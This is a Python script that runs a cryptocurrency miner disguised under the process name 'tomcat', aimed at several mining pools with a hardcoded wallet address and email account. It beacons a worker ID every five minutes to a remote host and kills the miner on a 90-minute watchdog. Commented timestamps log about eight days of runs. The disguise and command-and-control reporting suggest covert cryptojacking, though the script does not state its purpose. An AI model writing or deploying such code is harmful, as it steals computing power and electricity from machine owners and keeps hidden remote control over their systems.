import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:04.618690
#2018-02-17 17:28:01.771806
#2018-02-17 19:17:05.302442
#2018-02-17 21:06:04.221405
#2018-02-17 22:49:06.665784
#2018-02-18 00:33:04.539808
#2018-02-18 02:23:06.375466
#2018-02-18 04:10:07.873283
#2018-02-18 06:01:07.769653
#2018-02-18 07:51:04.943000
#2018-02-18 09:38:04.020555
#2018-02-18 11:23:05.994232
#2018-02-18 13:09:06.165172
#2018-02-18 14:57:06.824332
#2018-02-18 16:46:04.578264
#2018-02-18 18:33:07.054670
#2018-02-18 20:21:01.203882
#2018-02-18 22:06:07.393563
#2018-02-18 23:54:05.504950
#2018-02-19 01:40:06.657673
#2018-02-19 03:28:01.522315
#2018-02-19 05:13:04.006816
#2018-02-19 06:59:02.179508
#2018-02-19 08:48:01.920045
#2018-02-19 10:38:02.202394
#2018-02-19 12:25:08.713291
#2018-02-19 14:12:07.135426
#2018-02-19 16:02:01.732326
#2018-02-19 17:49:02.136364
#2018-02-19 19:37:06.275692
#2018-02-19 21:24:06.981413
#2018-02-19 23:11:04.115335
#2018-02-20 00:55:08.982197
#2018-02-20 02:43:07.556576
#2018-02-20 04:32:07.850566
#2018-02-20 06:16:01.740359
#2018-02-20 08:00:09.629530
#2018-02-20 09:45:07.442370
#2018-02-20 11:29:05.728854
#2018-02-20 13:16:03.853500
#2018-02-20 15:00:10.274094
#2018-02-20 16:45:11.434246
#2018-02-20 18:33:06.948419
#2018-02-20 20:24:05.214537
#2018-02-20 22:11:03.060159
#2018-02-20 23:53:07.745866
#2018-02-21 01:38:07.109941
#2018-02-21 03:27:01.984801
#2018-02-21 05:14:04.950031
#2018-02-21 07:02:05.194141
#2018-02-21 08:47:05.056699
#2018-02-21 10:33:01.546276
#2018-02-21 12:21:01.622757
#2018-02-21 14:08:02.057630
#2018-02-21 15:54:04.852152
#2018-02-21 17:46:07.005975
#2018-02-21 19:32:04.665981
#2018-02-21 21:19:07.084894
#2018-02-21 23:05:06.079518
#2018-02-22 00:55:06.879600
#2018-02-22 02:44:01.717965
#2018-02-22 04:31:05.485039
#2018-02-22 06:16:07.481154
#2018-02-22 08:03:02.062521
#2018-02-22 09:50:10.938449
#2018-02-22 11:36:07.135410
#2018-02-22 13:23:02.156436
#2018-02-22 15:12:06.649063
#2018-02-22 16:56:09.109065
#2018-02-22 18:46:05.918412
#2018-02-22 20:39:01.699140
#2018-02-22 22:26:01.834085
#2018-02-23 01:14:08.204061
#2018-02-23 03:01:08.530749
#2018-02-23 04:48:05.690910
#2018-02-23 06:35:08.242828
#2018-02-23 08:23:06.512586
#2018-02-23 10:39:03.875832
#2018-02-23 12:33:04.658785
#2018-02-23 14:19:06.398004
#2018-02-23 16:12:05.069615
#2018-02-23 17:56:07.882170
#2018-02-23 19:41:06.942785
#2018-02-23 21:24:05.632697
#2018-02-23 23:12:01.749667
#2018-02-24 01:01:01.537014
#2018-02-24 02:54:06.374914
#2018-02-24 04:42:07.169659
#2018-02-24 06:26:03.934556
#2018-02-24 08:14:05.050738
#2018-02-24 09:59:02.064993
#2018-02-24 11:58:01.268852
#2018-02-24 13:45:06.831373
#2018-02-24 15:40:01.568728
#2018-02-24 17:34:05.223052
#2018-02-24 19:20:08.447801
#2018-02-24 21:11:01.486239
#2018-02-24 23:44:01.567890
#2018-02-25 03:05:05.833934
#2018-02-25 06:55:07.303537